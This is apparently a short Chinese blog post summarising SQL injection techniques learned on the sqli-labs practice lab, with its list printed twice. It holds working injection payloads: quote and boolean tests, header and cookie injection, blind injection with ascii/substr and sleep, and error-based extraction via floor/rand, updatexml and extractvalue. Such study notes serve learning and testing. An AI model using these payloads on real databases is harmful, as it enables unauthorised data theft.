学习完sqli-labs总结
2017-09-29 15:47
176 查看
sqli-labs全部过了一遍 这里总结下这段时间学习到的东西 然后转战下sql脚本和sqlmap源码
简单注入: 单引号 双引号 and or 1=1 1=2 a()
POST注入: agent cookie referrer注入
注释注入 # --+
盲注:判断 ascii(substr((select database()),1,1))>10 sleep(5)
报错型注入:floor:and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from
information_schema.tables group by x)a)
updatexml:and 1=updatexml(1,concat(0x7e,(select database())),1)
extractvalue:and 1=extractvalue(1,concat(0x7e,(select database())))
先想这么多 以后补充
简单注入: 单引号 双引号 and or 1=1 1=2 a()
POST注入: agent cookie referrer注入
注释注入 # --+
盲注:判断 ascii(substr((select database()),1,1))>10 sleep(5)
报错型注入:floor:and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from
information_schema.tables group by x)a)
updatexml:and 1=updatexml(1,concat(0x7e,(select database())),1)
extractvalue:and 1=extractvalue(1,concat(0x7e,(select database())))
先想这么多 以后补充
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- Sqli-labs学习SQL注入-Lesson 1-10总结
- Mybatis学习总结之动态SQL与模糊查询
- sqli-labs从零开始学习日记(一)
- T-SQL游标学习总结
- 每日学习总结:DropDownList是否已选择验证、存储过程参数为sql字符串问题、将截断字符串或二进制数据。\r\n语句已终止
- SQL学习总结(一)
- sql 学习之二(sql常见性能优化总结)
- 总结一周内学习的Sql经验(一)
- 黑马程序员之SQL学习笔记:数据库基础知识点学习总结
- DB2学习总结—SQL语句
- 基于实际项目的SQL学习总结
- SQL学习总结(四)
- Sql Server2005 Transact-SQL 新兵器学习总结之-TRY…CATCH
- SQLi-Labs学习笔记
- DB2数据库常用SQL命令学习总结汇总
- sql优化学习总结
- 每日学习总结:DropDownList是否已选择验证、存储过程参数为sql字符串问题、将截断字符串或二进制数据。\r\n语句已终止
- MySql之SQL语句学习总结
- Ibatis学习总结2--SQL Map XML 配置文件
- Sql Server2005 Transact-SQL 新兵器学习总结之-DDL触发器